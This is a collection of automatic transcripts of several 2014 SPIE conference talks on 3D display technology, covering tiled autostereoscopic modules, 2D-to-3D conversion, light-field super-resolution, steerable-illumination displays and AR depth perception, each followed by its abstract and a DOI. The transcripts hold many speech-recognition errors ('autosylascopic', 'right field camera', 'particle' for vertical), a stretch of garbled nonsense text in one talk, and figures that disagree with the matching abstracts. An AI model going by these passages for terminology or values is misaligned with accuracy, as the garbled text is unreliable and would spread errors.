Thank you Mr. Chairman. My name is Ken Shirevayach from Tokyo University of Agriculture and Technology. The title of my talk is Frameless Multi-View Display Modules Employing Flat Final Displays for a Large Screen Autosylascopic Display. A large screen autosylascopic display provides viewers with great impression and life-size realistic communications. What we need to achieve this purpose? We need more than 100-inch screen, glasses-free, supporting multi-view viewers, easy installation and relocation, and no need of darkroom. The multi-projection system has been most commonly used to construct a large screen autosylascopic display. NICT constructed the system having a screen size of 200 inches. The projection length was 8.0 meters. Holographic commercialized the system having a 140-inch screen. The projection length was 5.6 meters. Samsung developed the system having a 100-inch screen. The projection length was 3.4 meters. In order to obtain a large screen size, the multi-projection system requires a long projection length, thus a large operating space is required. The tiling of multi-view displays has been proposed for the construction of large screens. Because each display has a small screen, the tiling system does not have a large projection length. So the tiling system, as system depth, is much shorter than the multi-projection system. Moreover, this system can be configured in various ways, such as landscape, portrait, and curved screen. Therefore, it can be used in various applications. In this study, we proposed the tiling of primary smart-view display modules that employ flat panel displays. This slide shows the previous tiling systems that we developed. This is the 3D pixel module that we developed. It was constructed using a 2D array of LCD panels and a 2D array of cylindrical lenses. These 3D pixel modules were two-dimensionally tiled. This is the multi-view display module that we presented last year at this conference. It was composed of MEMS project array and the lenticular lens. Each tiling techniques in order to eliminate gaps exist in the tiled screens. This slide shows the Ariscopy Lab system developed by CoveryDiscreed, conventional multi-view displays using a Parax barrier while tiled. As you can see, the tiled screen has a parent, particle, and horizontal gaps, because each multi-view display has a bezel. Now I'll explain the proposed frameless multi-view display module. The proposed module consists of a multi-view flat panel display, an aperture, an imaging lens, a screen lens, and a particle diffuser. Two imaging systems exist in this module. In first imaging system, the imaging lens projects the screen of the multi-view flat panel display onto the screen of the module, which consists of screen lens and vertical diffuser. When the magnification is larger than unity, a frameless screen is obtained. The imaging system is designed such that the dimension of the imaging lens does not exceed the dimensions of the screen of the module. Next, I'll explain the second imaging system. The multi-view flat panel display generates multi-view viewpoints. At this position, the aperture is placed to eliminate repeated viewpoints in the horizontal direction. In second imaging system, the combination of imaging lens and the screen lens projects the viewpoints of the multi-view flat panel display onto the observation space in order to generate viewpoints for observers. The particle diffuser increases the particle viewing area. Because the repeated viewpoints are eliminated by the aperture, the 3D image do not flip at the boundary of the viewing area. Next, I'll explain the operating principle again using horizontal sectional view. As I mentioned, two imaging systems exist in the module. In the imaging system for screen, the imaging lens projects the screen of the multi-view flat panel display onto the screen of the module. In imaging system for viewpoints, the combination of imaging lens and screen lens projects the viewpoints of multi-view display onto the viewpoints for observers. This slide shows the particle sectional view without aperture and the particle diffuser. In this case, the viewing area has sufficient height, however, the off-axis aberrations cause the image degradation. With aperture, the aperture limits the particle direction, which helps reduce the image degradation due to off-axis aberrations. However, the height of the viewing area decreases. Finally, with particle diffuser, the height of the viewing area increases. When the multiple modules are tied to obtain a large screen size, a common viewing area for all modules must be created. Three possible methods are available. First method is to properly see the screen lens in each module. The second is to properly see the aperture in each module. The third method is to properly notice each module. These three methods can be used simultaneously. Now, I'll explain the design of the ProBalls module we constructed. First, I'll explain the multi-view flat panel display. The Rentecure lens was designed that was attached to the LCD panel to construct the multi-view flat panel display. The range pitch was 1.482 mm. The slant angle was 0.76 degrees. The focal length was 2.59 mm. The number of lenses was 320. We used the LCD panel with screen size of 22.2 inches and the resolution of 3840x2400. The constructed multi-view display had 3D resolution of 320x200 and 144 viewpoints. Distance to viewpoints was 537 mm. The viewing area with this was 308 mm. Now I'll explain the measuring system. We use commercial friendly lens because large diameters are required. As you know, friendly lenses do not possess the ideal imaging property. I decided to construct the imaging system by using two friendly lenses to decrease distortion and the imaging system length. Another focal length of the lens was 592 mm. In this imaging system, the magnification was 1.23. So the screen size of the module was 27.3 inches. The imaging system length was 1.49 meters. Next, this slide explains the viewpoints generation. We also use commercial friendly lens as a screen lens. Measured focal length was 991 mm. The viewpoints were imaged by the left imaging friendly lens to generate viewpoints. The combination of right imaging friendly lens and screen friendly lens generates the viewpoints for observers. This magnification was of 8.57 as a distance of 5.79 meters from the screen. Horizontal width of the viewing area at this distance was 2.64 meters. This slide explains the structure of screen friendly lens. To realize the screen, the side surfaces of screen friendly lens had two step structures. These groups were used to support the screen friendly lens by using the side plate of the module. As you can see, the screen was achieved. This is a prototype display module we constructed. Specifications are shown in this table. Screen size was 27.3 inches. The 3D resolution was 320 by 200. The number of views was 144. The distance to viewpoints was 5.79 meters. The viewing area width was 2.64 meters. The interval of viewpoints was 18 mm. The module length was 1.5 meters. A prototype display system with a medium size screen was constructed using four modules which are vertically aligned to obtain a screen size of 62.4 inches. To generate a common viewing area for all modules, the center of the screen lenses were shifted in vertical direction as shown in this figure. The light figure shows the viewing area of the prototype system. Multiple viewers are supported. This photograph shows a developed type of the system. Human size 3D image can be displayed. This photograph shows a generated 3D image captured from left, center, and light. Proper motion power acts were obtained. Unfortunately, the thin gaps were observed as boundaries between the modules. It was caused that a certain amount of rays was actually being netted inside the modules because of aberrations. Now, let me show you some videos. As you can see, the 3D image is bright enough to be viewed in the room at daytime. Next, the 3D image of a girl. As you can see, the 3D image has smooth motion power acts. This is the final video, the 3D image of the space shuttle. Now I conclude my talk. In this study, the Tiling of Multi-View Display module was proposed to construct large-screen autosystemic displays. The constructed modules had a screen size of 27.3 inches and a resolution of 320 by 200. Four modules were aligned, particularly to provide a screen size of 62.4 inches for displaying a human-sized object. Thank you for your kind attention.
|
A large-screen autostereoscopic display enables life-size realistic communication. In this study, we propose the tiling of frameless multi-view display modules employing flat-panel displays. A flat-panel multi-view display and an imaging system with a magnification greater than one are combined to construct a multi-view display module with a frameless screen. The module screen consists of a lens and a vertical diffuser to generate viewpoints in the observation space and to increase the vertical viewing zone. When the modules are tiled, the screen lens should be appropriately shifted to produce a common viewing area for all modules. We designed and constructed the multi-view display modules, which have a screen size of 27.3 in. and a resolution of 320 × 200. The module depth was 1.5 m and the number of viewpoints was 144. The viewpoints were generated with a horizontal interval of 16 mm at a distance of 5.1 m from the screen. Four modules were constructed and aligned in the vertical direction to demonstrate a middle-size screen system. The tiled screen had a screen size of 62.4 in. (589 mm × 1,472 mm). The prototype system can display almost human-size objects. © (2014) COPYRIGHT Society of Photo-Optical Instrumentation Engineers (SPIE). Downloading of the abstract is permitted for personal use only.
|
10.5446/32364 (DOI)
|
I am Vikram Apeya. I work at the Imaging R&D Lab at Texas Instruments and I will be giving a talk on a paper we wrote about fully automatic 2D to 3D conversion using high level features. So here is a brief introduction of what 2D to 3D conversion is. So if you have a scene that is being viewed by an observer, the left and the right I have two different viewpoints and our brain takes these two viewpoints and fuses them together to give us 3D depth of the scene. So the problem of 2D to 3D conversion is that if you have a 2D image, you would want to create two different viewpoints so that when seen by a viewer using an anaglyph, he can simulate the effect of having a left and a right eye view of the scene and once you have that you create a 3D model of the scene. So this model here is actually taking this image and I just ran it through my algorithm here and created a 3D scene. I will have some more examples later in the talk. So let me quickly jump to the overview of the talk. So the basic 2D to 3D conversion algorithm takes a single 2D image and based on some image features and some local training that we did, we create the image into a pseudo depth map. So we used some low level features like gradient and location. We analyzed a few different features and we narrowed it down to gradient and location being the most suitable one for this task. And then on top of that we add some high level features like faces, sky and foliage trying to detect these in the scene and enforce some more depth cues to make the depth map more realistic. And once we have the depth map, we do a view synthesis which is basically taking the 2D image that you have and creating two different views, the left and the right view, to be presented for a 3D system. So this is like a brief overview of the algorithm and I will go through in little more detail in each of these topics as I go forward. So for training what we did was we took a 3D camera, the Fuji 3D camera. We captured multiple consumer images and we used the segment based adaptive belief propagation method to create depth maps or disparity maps from these images. So the idea is we were trying to create 3D images from still existing consumer 2D images. So we captured 3D images with a consumer camera and we are trying to analyze different kinds of consumer scenes and create 3D for such scenes. So once we have multiple of these training images, we needed to find correlation between the disparity map that we generated in the original image. So for that we classified our training images into three different categories. We basically divided our image into three different regions and we analyzed the amount of gradient in each of these regions. So we are making some assumptions about the scene here. The assumptions are that the more gradients or the more texture there is in an object, the closer to the camera and the ones that are farther away have lesser texture. And the other assumption we are making is that in most consumer images, the object of interest or the things that are closer to the camera are towards the bottom of the scene and the things that are on the top of the scene are actually farther away from the camera. So these are some strong assumptions we are making about the scene but if our scene fits into these assumptions, we are able to create 3D models out of these. So it's also possible to divide your image into multiple different layers depending on if you want to take out this assumption about having objects at the bottom of the scene being closer. But for our cases, we were happy to have just, we got sufficient performance by just doing this kind of classification. So once we have classified our training models into these three categories, we take the average of all the depths of the images that we get in each of these categories. So we see that we get three different kinds of depth images. And now once you have a test image, you again take the same three regions, take the total amount of gradient in each of these regions and that gives you a ratio of the amount of activity in each of these regions. So you take a linear weighted combination of these three depth images and create a scene model. So what this does is it tailors a new scene model specifically for the scene that you are interested in. So for example, if you have a person standing in the scene towards the center of the image, that region would have much higher gradient than the other regions. So you can have a scene model which is closer to the one where the center has more activity. So depending on how the scene is formed, you can actually create a specific scene model for each of these scenes. So once we have this, these are all just based on low level features, which is gradients. So here is an example of how you would convert a given 2D image into a depth map. So here I'm taking an example of a 2D scene. I used the model that I previously described to get a depth map out of there. So first what we do is we use a color and edge-based segmentation algorithm to segment the image into multiple different regions. And we take the centroid of each of these regions, look back at the scene model that we created for this particular image, and assign depth to each of these regions. So this is the depth map that you get using the scene model that we had. Now this clearly has a very distinct problem here. The fact that the face and the body has been given two different depth, because typically human beings wear different colored clothes, and it's more natural for segmentation algorithms to segment the face separately from the body. So we need some more higher level information here. So and if you create a depth map using this, you will have this effect of sharing where the person would be shared from neck up and his body would be separate. So to overcome this problem, we had to add some high level features. High level feature that we added was a face detection. So what we do here is we basically use a face detection algorithm to take the face in the scene. And then we use the same segmentation algorithm, but we over segment the objects in this scene. So now that we have multiple smaller segments, we find out all the regions which have centroids that lie within this blue box. So we basically take the face, we look at a slightly larger region, and combine all the segments that fall within that region. So that gives you a mask of the face. Now that you know where the face lies in the image, you assume that whatever is below the face belongs to the body of the person. So you take the depth and enforce the depth for the face to be the same as the body, so that the entire object or the entire person becomes one contiguous region. So this can overcome the problem of shearing neck up for human beings in the faces. And since we are targeting consumer images, this is a very common image that falls in this category. The next high level feature that we considered was for outdoor images where there are sky and foliage in the scene. So in this image here, we use the same low level features based on gradient and we create a depth map where we see that the depth looks very, so in this case, the black regions are closer to the camera and the white regions are farther away. So it shows that this particular trees here are actually farther than the sky. So just using low level features, you are not able to identify how these depth can be assigned correctly. So what we did was we used scene classification. We figured out which regions in the images are sky, which regions are foliage, and which regions are the foreground. And we enforced this on the depth maps. So now what we do is we ensure that the ordering is correct so that the sky is always the farthest object. The foliage falls between the sky and the foreground. And then on top of that, we again do the face detection. And we make sure that the entire person is one contiguous object and we create a depth map based on that. So these are some high level features. There could be many more high level features added on top of this depending on the class of images that you are trying to address. So this basically is how we create the different depth maps. In the next slide, I will talk about how once you have a depth map, how do you create two different left and right views. So for this, we do something called the view synthesis. So here's an example of how view synthesis work. You take an image, you again create the depth map that you wanted to create. And to create a left and right image for the 3D image, you have to move objects around based on this step. So if you see here, for the left and the right image, these objects have been moved around within the image. But this creates a new problem of holes because of occlusion. Since you have moved the objects, you don't know what's behind the object. So we need to solve this problem as well before we can present it to the user. So now there are some very basic methods to much more complicated methods. So I'll start discussing a few basic methods, show what their flaws are, and show the solution that we propose for view synthesis. So the first method is a very simple background interpolation. What this does is it just takes pixels that are on one edge of the hole and just keeps extrapolating it towards the other end. This makes an assumption that the background of the scene is smooth. So if you have a smooth white wall or something very simple, you will get a good performance. But if you have edges, like in this case here, you'll have these different kinds of artifacts. And since these artifacts will be different in the left and right image, when you present it as an anaglyph, it starts creating very uncomfortable viewing experiences. Here's another very straightforward method, which is the mirroring. Basically you just take a scene in the other side of the hole and you just mirror it around and present it to the user. This again has its own artifacts, which will become very noticeable in 3D. More commonly what people do is they just use a low pass filter on the depth map to smooth out all the regions. And this creates a much more cleaner synthesized left and right views. But this also introduces a lot of geometric distortions. For example, if you see this particular region here, the pen has been distorted completely because of the smoothing. And the issue here is that the left and the right images will have two different kinds of distortions. So this again will create a much more displeasing view in the 3D image. So to overcome this, rather to circumvent this problem, what we propose is that we have to introduce distortions. There is no way around it because you have holes. You need to fill those holes somehow. So what we are proposing is that we take all the distortions, keep the foreground regions, which is what the users are more keen on viewing. For example, faces, and try and push all the distortion in the background regions. So what we do is we keep the foreground regions just as it is, and we take all the warping or the distortions and warp the background. So in this case, you're pre-processing the depth map in such a way that the foreground remains clean, but all the distortions are being pushed towards the background. So you do see some distortions here, but your pen, which is the foreground, which is the first thing that users will notice, remains clean. So that's the basic idea of warping and how you can actually push the distortion, especially the geometric distortions to the background, which is not very noticeable to the user. So with that, those are the main steps, and here I'm just trying to summarize all the steps that I described so far. So we take a 2D image, which is our test image. We do a segmentation, segmented into multiple different regions, and then based on image cues like gradients and the training data we had, we assign some depth maps, depth values to each of these regions, and then we use some high-level features like face detection and sky and foliage detection to enforce the depth, to make it a much more cleaner depth map. Once you have the depth map, we use the warping method to get a cleaner pre-processed depth map, and then we create two different views. In the next few slides, I have some examples for 3D images, maybe if you have some glasses. So I've never tested this on the projector. Hopefully these look fine here. So these are some examples of the depth map that we created for this scene, and these are the 3D images that we see there. These are some more examples. So when I started working on this project, I got a lot of requests from people to convert their existing 2D images to 3D. So this was a friend of mine who asked to create a 3D image of his daughter's picture. This is my co-author, Umit. This is a picture of him as we are discussing how faces would be segmented independently from the body. Here are some more examples. And this is the example of the image that we showed here. So that concludes my talk. And so what we did here was we took some amount of high-level information, and there are many different ways of incorporating higher-level information. So this is not a complete solution to 2D to 3D conversion, but this is just a step towards making, adding more features into our 2D to 3D conversion and getting 3D images from existing 2D images. So with that, I conclude my talk.
|
With the recent advent in 3D display technology, there is an increasing need for conversion of existing 2D content into rendered 3D views. We propose a fully automatic 2D to 3D conversion algorithm that assigns relative depth values to the various objects in a given 2D image/scene and generates two different views (stereo pair) using a Depth Image Based Rendering (DIBR) algorithm for 3D displays. The algorithm described in this paper creates a scene model for each image based on certain low-level features like texture, gradient and pixel location and estimates a pseudo depth map. Since the capture environment is unknown, using low-level features alone creates inaccuracies in the depth map. Using such flawed depth map for 3D rendering will result in various artifacts, causing an unpleasant viewing experience. The proposed algorithm also uses certain high-level image features to overcome these imperfections and generates an enhanced depth map for improved viewing experience. Finally, we show several 3D results generated with our algorithm in the results section. © (2014) COPYRIGHT Society of Photo-Optical Instrumentation Engineers (SPIE). Downloading of the abstract is permitted for personal use only.
|
10.5446/32368 (DOI)
|
Thank you, Mr. Chairman. My name is Kazuki Ohashi. I'm a master of Nagoya University. Today I will be talking about joint estimation of high resolution image and depth maps from right field cameras. First I'm going to talk about overview of our research. Left is a low image captured by a right field camera. Top of left in this image is closed up. As you can see here, the low image is special. Much with sub aperture images are produced from the low images. These are low resolution. Thus in our research, high resolution images are produced from the multiple sub aperture images. Then let me mention what right field cameras are. Right field cameras attract much attention as tools for acquiring 3D information of a scene through a scene camera. In right field camera, a micro array is inserted between the sensor and the main lens. This structure enables some applications. Some right field cameras are commercially available, such as right-row. The application of right-row are digital refocusing and clear viewpoint image synthesis. Let me show these applications. In the digital refocusing, we focus on the point which we click. In the clip view point image synthesis, we can see the image from the viewpoint which we choose. Right field cameras are able to capture several views of a scene simultaneously. These images of several views are sub aperture images. I will explain how to convert low image to sub aperture images. This is a low image captured by a right field camera. A micro lens is close-up. So there are multiple pixels behind the micro lens. Sub aperture images are formed by extracting a pixel at the same position from each micro lens and arranging all of them. For example, this sub aperture image is formed by gathering pixels of a position of 1. Then the position of 2 is gathered. Then the position of 3 is gathered. The left image is a low image of a right field camera. The right image is arranged sub aperture images. As shown in these images, sub aperture images can be regarded as a set of rectangular images whose viewpoints are arranged on a 2D surface corresponding to the aperture of the right field camera. Thus, sub aperture images are stereo images. The resolution of sub aperture images is the number of micro lens because pixels of sub aperture images are arranged by extracting a pixel from each micro lens. In right field cameras, the number of micro lens corresponds to the angular resolution and the number of pixels behind the micro lens corresponds to the position resolution. Thus the angular resolution and the position resolution trade off under the fixed resolution of the image sensor. So the resolution of sub aperture images is low. For example, in our case, the resolution is 325 by 377. This is main drawback of right field cameras. High resolution is a technique that enhances the resolution of images. Flow of sub aperture, sorry, flow of superexolution reconstruction is as follows. First, we register multiple observed images. Secondly, we estimate and optimize high resolution image by using the registered image. Superexolution reconstruction is very sensitive to registration error, so accurate registration is necessary. I will explain the purpose of our method. To overcome the low resolution of sub aperture images, we enhance the resolution of sub aperture images by using superexolution reconstruction. In superexolution reconstruction, accurate registration is necessary. So registration is equivalent to depth estimation. And thus we proposed the method that jointly estimated high resolution images and depth marks. In our method, we increase the resolution of the image and depth marks. Here is what we did in the proposed method. First we calculate the initial depth map and the initial high resolution image. The initial depth map is calculated by still matching among sub aperture images. So the initial depth resolution is limited by the resolution of the sub aperture images. And the initial high resolution image is calculated by bi-cubic interpolation of a sub aperture image. After that, we perform depth refinement. In the depth refinement, the depth map is optimized and then we increase the depth resolution. And then we perform superexolution reconstruction. In the superexolution reconstruction, the image is optimized and then we increase the resolution of the image. As shown this, we perform the depth refinement and superexolution reconstruction alternatively. In our method, this energy function should be minimized. This energy function represents the square error of sub aperture images and the deteriorated image from estimated high resolution image. The area of minimization of energy function is as follows. First give the initial values to high resolution image and depth map. Then we perform depth refinement. In the depth refinement, provided that x is a fixed value of optimized d. Then we perform superexolution reconstruction. In the superexolution reconstruction, provided that d is a fixed value of optimized x. Finally, iterate step two and step three until convergence for fixed number of times. In our method, the superexolution reconstruction is implemented by image processing operations. We use the gradient descent method as described first and second equation. The matrix is decomposed into as described third equation. Each matrix represents subsampling motion blurring. Likewise, transpose of ak is decomposed into as described fourth equation. It is trivial that the operation of akx can be implemented by image processing operations. The image of akx can be blurred, shifted, subsampled. However, multiplication, trans of ak does not seem to be straightforward. If transpose of ak can be implemented by image processing operations, the superexolution reconstruction can be implemented by image processing operations. Thus, we add some assumptions to each matrix decomposed from ak. The blur matrix B is assumed to be spatially invariant and symmetric. The motion matrix MK is assumed to be pixel-shift limited integer values. Regarding transpose of B, transpose of B is equal to B, so transpose of B is implemented by smoothing filter. Next, transpose of MK represents pixel-shift that are opposite to MK. Transpose of D represents upsampling matrix inserting zero elements at regular intervals. All of these can be implemented by image processing operations. So transpose of ak and the superexolution reconstruction can be implemented by image processing. We perform depth refinement to minimize the energy function. In the case that we optimize this D2, we change the old depth in the block. Then we compare the pixels of high-resolution images to the corresponding pixels of sub-aparture images. These correspondences are given by depth value and adapt the values which reduce the difference between the compared pixels. We have conducted an experiment to confirm the effectiveness of our method. We use a right-fielder camera. The resolution of low image is 3280 by 3280. The resolution of sub-aparture images is 325 by 377. The number of sub-aparture images is 25. First we compare the estimated high-resolution images. Left image is calculated by bi-cubic interpolation. Left image is superexolution reconstruction without depth refinement. Right image is calculated by the proposed method which is superexolution reconstruction with depth refinement. Let me show close up of the last images. Left is bi-cubic interpolation, sent as SR without depth refinement. Right is the proposed method. Compared to these, we found the proposed method can produce clearer images. Left is before depth refinement which is calculated by stereo matching. Right is depth after depth refinement. This energy function E is plotted against the number of iterations in this graph. Blue line is using superexolution without depth refinement. Left line is using the proposed method. In this graph, the proposed method reduces the energy function E compared to superexolution reconstruction without depth refinement. Now let me summarize my presentations. We proposed a method of joint estimation of high-resolution images and depth maps from right field cameras to overcome the drawback of right field cameras. The key concept is that the depth resolution should also be increased with superexolution reconstruction so that depth refinement is conducted alternatively with the resolution enhancement of the image. As the experimental result, we improved the high-resolution image compared to the superexolution without depth refinement. As a future work, we will improve the depth refinement to obtain more accurate depth map. Thank you for your attention.
|
Light field cameras are attracting much attention as tools for acquiring 3D information of a scene through a single camera. The main drawback of typical lenselet-based light field cameras is the limited resolution. This limitation comes from the structure where a microlens array is inserted between the sensor and the main lens. The microlens array projects 4D light field on a single 2D image sensor at the sacrifice of the resolution; the angular resolution and the position resolution trade-off under the fixed resolution of the image sensor. This fundamental trade-off remains after the raw light field image is converted to a set of sub-aperture images. The purpose of our study is to estimate a higher resolution image from low resolution sub-aperture images using a framework of super-resolution reconstruction. In this reconstruction, these sub-aperture images should be registered as accurately as possible. This registration is equivalent to depth estimation. Therefore, we propose a method where super-resolution and depth refinement are performed alternatively. Most of the process of our method is implemented by image processing operations. We present several experimental results using a Lytro camera, where we increased the resolution of a sub-aperture image by three times horizontally and vertically. Our method can produce clearer images compared to the original sub-aperture images and the case without depth refinement. © (2014) COPYRIGHT Society of Photo-Optical Instrumentation Engineers (SPIE). Downloading of the abstract is permitted for personal use only.
|
10.5446/32369 (DOI)
|
Thank you for the introduction. So my presentation is about AutostereOS speak display system. So this is our talk. So at first I will discuss about the present problems of the autostereoscopic display methods. Then I will show some examples of autostereoscopic display methods based on forming exist pupules for both eyes. Then I will show the principle of the multi-user autostereoscopic display based on the direction controlled illumination using a slanted chivalrin-doe-kal lens array. Then I will show the experimental results for verification of our proposed method. And I will discuss some issues, especially about illumination informity. Then I will conclude my talk. So now we get some, so many student movies are released and I can buy the 3D TVs. So but usually we use 3D glasses for providing binocular parts. So many research is of autostereoscopic display existed. Most of such display use a parax barrier or a lenticose sheet. So such a system based on the parax barrier or lenticose sheet have some problems such as the resolution degradation because of the optical devices on the LCD panels and the restriction of the viewing points. Then this is the example of the autostereoscopic display based on the projection. So this type of display has a very large viewing region and no degradation of the image resolution. So here are the many projectors. And the real images of the pupils of each projectors are formed by using the feed lens attached with the diffuser. Then so each projector, each pupil of the projectors are imaged around the viewing zone. Then we can see the different parts images through the corresponding pupils. So the dimensions of this method, it's a large volume for many projectors are required and it needs high cost. So this shows the autostereoscopic display based on forming the pupil for both eyes. So here is the eyes. So this system formed the exo pupil around the eyes. So the system have a head tracking system. So the system detects the position of both eyes and the exo pupil is formed around the eyes. So this have merits for the large viewing region and no degradation of the image resolution and the low cost than the multi-projector system. So this system consists of the image display unit, this is implemented by the LCD display and the direction control unit. So this shows an example of the autostereoscopic display using the specially distributed right sources and feed lens. So in this case here is the right source array and this is a transmission type display panel. So it's created by the LCD and the condenser lens is attached with the display panel. So the right source is made of this LCD and the image of the right source is formed around the viewing position. So then this head tracking system detects the position of the both eyes. So according to the position of the viewer, so changing the right source position. So location of the exo pupil at the viewer's eyes using the head tracking system. Then so this is good for the cost effective system but under no degradation of the image resolution. So these have a merit about the restriction of the position of the exo pupil at a certain distance from the display panel because of the using this kind of the imaging system. So this is another example of the autostereoscopic display. So this is proposed by the sermon and this user, so this type of slanted stacks of the same syndical lenses. So this can expand the position of the existing pupil in the depth direction. So this is a sterling optical system controlled horizontal direction of the illuminating light for each horizontal direction and form the, this system form the pupil around the eyes for stereoscopic view. So the drawback of this system is so, an uniformity of illumination. This is caused by the use of the discrete optical system. So this course is discontinuity of the illumination. So the purpose of this study is improvement of the muted method. So we propose the autostereoscopic display method based on the principle similar to the muted method. So utilizing the continuous optical element for the sterling light system for the improvement of the illumination uniformity. Then while maintaining the characteristics of the muted system, such as high resolution and large image size and no restriction of the viewing position or availability for the multiple viewers or the compact system configurations. Then I will show the experimental system for verification of our proposed method. So this should propose the system, this consists of the image display unit and the direction control emulation unit. So image display unit is implemented by the ordinary LCD panel. So the emulated light has a controlled horizontal direction. Then direction control emulation unit consists of this specially modulated parallel light source and slanted cylindrical rays array and vertical light diffusing seats. So these are, we call these system, sterling optical system. So this shows the light ray, incident light ray into the cylindrical rays. So the incident light into the cylindrical rays is deflected at angle. So depending on the distance from the center line of the cylindrical rays. So this angle is depending on the position from the center line. And it is possible to change the position of the light ray without changing the direction angle by changing the incident position in the direction parallel to the center line of the cylindrical rays. So this shows the vertical direction, light of the direction. So here is the cylindrical rays and after passing the cylindrical rays, so light will deflect and we use a directional diffusing sheet for diverging the light in the direction, vertical direction. Then so the second diffusing sheet is for the deflect to the light to the viewer. So about this distance, so it is required enough distance for illuminating the whole range of the image display. So here is the LCD panel. So enough distance is required for the illuminating for area. So this system can control the horizontal direction of the light propagation under the position of the long strip line illumination. So then by changing the incident light, incident position in the cylindrical rays, we can concentrate the light from the display panel at certain position by controlling the direction of each light propagation for each position. So we call this incident pattern, we call this pattern as a control pattern. So we use a control pattern like this, so the X-pouple is formed around the viewing area. So it is possible to form X-pouple using this system. So an observer can watch the image on the image display when X-pouple is at the position of eyes. And the auto-stereoscopic view is achieved by switching the PARACS image on the display panel in accordance with the alternately changing the position of the X-pouple position. And it is possible to locate the multiple viewers so without restriction within the viewing region. And so this shows the reduction of the system size using multiple cylindrical rays. So previously I talked about this distance, but it is possible to reduce the distance using the multiple cylindrical rays without expanding the viewing angle of this first division sheet. So the whole LCD area is illuminated by the combination of the split light emitted from each cylindrical range. The merit of the proposed method is one at first, no optical element after the display panel that degrades the image resolution. And it provides multiple viewing points without restriction. And compact and cost-effective realization is possible than the much projected methods. And the advantages of the proposed method over the muted method is the uniformity of illumination. So this is caused by the use of a long cylindrical lens instead of the stark lens. So this shows the relation between the position of the viewer and the control pattern. So this is the pattern into the cylindrical lens. This shows the equation, relation between position and this pattern. So this means a straight line. And the inclination of this line depends on the depth of the observable, depth of the position of the observer. The lateral position of the X-pouple is related to the lateral shift of this control pattern. So this shows the viewing reason. So here is the LCD panel and here is the starting optical system. So it depends on the A is the width of the cylindrical lens and FC is the focal length. The size of the viewing region depends on the numerical aperture of the cylindrical lens. And we constructed an experimental system for verification. So here is the LCD panel for image display. And here is a projector for control pattern. So it makes an incident right for the cylindrical lens. Here is the cylindrical lens array. And we placed a friend of lens before the cylindrical lens array. And here is the directional diffusing sheet for vertical diverging light. And this is configuration of the experimental system. So the focal length of this friend of lens is 1200 millimeters. And here is the cylindrical lens. So we used some cylindrical array for suppressing the storyline. And we used three directional diffusing sheets. So two sheets is necessary, but we used three because for suppressing the moire effect between the... So we used a high-pitched lenticular sheet so some moire is occurred. So we suppressed the moire by using three diffusers. So here is the LCD panel. So it is full HD, 32 inches. Then this should image detected. So the camera is placed each position for each eyes, each eyes, each pupil for each eyes. So the image was not observed at any position except for the existing pupil. So this showed the formation of the existing pupil based on this proposed method. Then maximum viewing angle is 80 degrees and angular resolution, so this is... So minimum angle or control of angle is 0.4 degrees. So this is... Depends on the resolution of the control pattern and focal length of the cylindrical lens. Then we measured irradiance distribution around the... Two minutes. Okay. It is for evaluating the crosstalk between both parallax images. So the half maximum for what we use is 5 centimeters. So crosstalk is enough small to view a telescopic image. Then I will... I will consider about some issues. So first, improvement of illumination and uniformity. So this shows a picture, take a picture. So this parallax shows a white image, but we can find some uniformity of the illumination. So especially for this... This steps, immunized tape causes this continuity of the cylindrical lens or control pattern at this point. So one improvement for suppressing this immunized tape, so we modulate the control pattern. So it graduated, graduated pattern. So the immunized distribution using this graduated pattern improved this continuity of the illumination. So another reason for the uniformity, the uniformity is a journey in the control pattern. So if the control pattern is also... Waste of the control pattern is comparable to the pixel size, so juggies can... So clearly observed. Then, so we can see the initial patterns or like straight patterns, particle stripes. So one improvement for this illumination and uniformity, so we use the smoothing and blur of the control pattern, so anti-aliasing methods. So particle stripes were stopped like this. So there are some other issues, so at first we have to... Okay, so after head striking system and more improvement of the power efficiency and more compact implementation is required. Then this is the conclusion of my talk. Thank you. Thank you.
|
This research aims to develop an auto-stereoscopic display, which satisfies the conditions required for practical use, such as, high resolution and large image size comparable to ordinary display devices for television, arbitrary viewing position, multiple viewer availability, suppression of nonuniform luminance distribution, and compact system configuration. In the proposed system, an image display unit is illuminated with a direction-controlled illumination unit, which consists of a spatially modulated parallel light source and a steering optical system. The steering optical system is constructed with a slanted cylindrical array and vertical diffusers. The direction-controlled illumination unit can control output position and horizontal angle of vertically diffused light. The light from the image display unit is controlled to form narrow exit pupil. A viewer can watch the image only when an eye is located at the exit pupil. Auto-stereoscopic view can be achieved by alternately switching the position of an exit pupil at viewer's both eyes, and alternately displaying parallax images. An experimental system was constructed to verify the proposed method. The experimental system consists of a LCD projector and Fresnel lenses for the direction-controlled illumination unit, and a 32 inch full-HD LCD for image display. © (2014) COPYRIGHT Society of Photo-Optical Instrumentation Engineers (SPIE). Downloading of the abstract is permitted for personal use only.
|
10.5446/32372 (DOI)
|
Tätä tässä on Mikko Keta, joka on KCorna tämän hoit sporop costaamisen popular sense. Polski, Pacht roupi apua. Imx щuttikumppi behistö correctvien niimi- foremostellatching-mierroaraa invitesem remplana Motivation for the study is that the perceptual problems are huge in augmented reality environments. And actually the death perception is the largest perceptual problem in AR applications. And so how this situation could be improved, we approach this problem by adding more depth cues to the scene. But the question is that which depth cues should be added and how they should be added. Here's the context of this presentation. So the context of this presentation uses video-sie to augmented reality system shown in here. Here is the HMD head mounted display. And we focus on distances within action space that are distances from 2 to 30 meters. Most of the death perception studies have been conducted within this personal space range, meaning tasks for a crash-crashping and like doing endoscopic surgery and very close range tasks. But we focus on action space and objects that are above a ground plane. Here are some schematic figure of virtual objects above a ground plane. So here is shown depth sensitivities of different depth cues as a function of depth. And in this study we focus on action space. And we can see that the depth cues change a lot according to depth. How you can read this figure is that for example at 10 meters distance, the depth sensitivity is 0.06. That means that observer can approximately perceive a depth threshold, which is depicted as delta z in the figure as a 0.6 meter distance. So this figure shows how accurately people use depth cues on average. It's a simplification but it's like a good rule of thumb. So our question was that which depth cues should be added to scene in applications within action space. Well, when we start from the top of the line from the most sensitivity depth cues, we can see that there is occlusion first one and height in visual field, relative size, motion parallax and binocular disparity. So if we look at the most sensitive depth cues within action space, these are the ones. So how these depth cues should be added to scene. Here is an our approach that uses these virtual aid objects called auxiliary augmentations. If we look at an figure shown here, here is an observer looking at the virtual arrow within the scene. And it is surrounded by physical objects and the observer has difficulties to perceive the position of the arrow. For example, in video see through handheld devices, the errors in depth perception are like 50% of depth. So it's not obvious where the arrow is in the scene. So our approach uses these auxiliary augmentations that are anchored to the real world, so that the position of these auxiliary augmentations can be perceived correctly. Once this position has been observed correctly, the observer can compare the depth of augmented objects with this object of interest to the auxiliary augmentations and relative depth cues among the augmentations can be used. In this case, for 